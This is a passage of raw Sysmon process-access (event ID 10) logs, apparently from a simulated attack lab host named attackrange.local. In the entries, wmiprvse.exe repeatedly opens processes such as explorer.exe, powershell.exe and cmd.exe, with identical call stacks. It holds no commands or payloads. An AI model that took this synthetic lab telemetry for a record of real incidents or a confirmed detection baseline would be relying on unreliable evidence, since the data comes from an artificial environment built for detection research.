tem32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.638{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 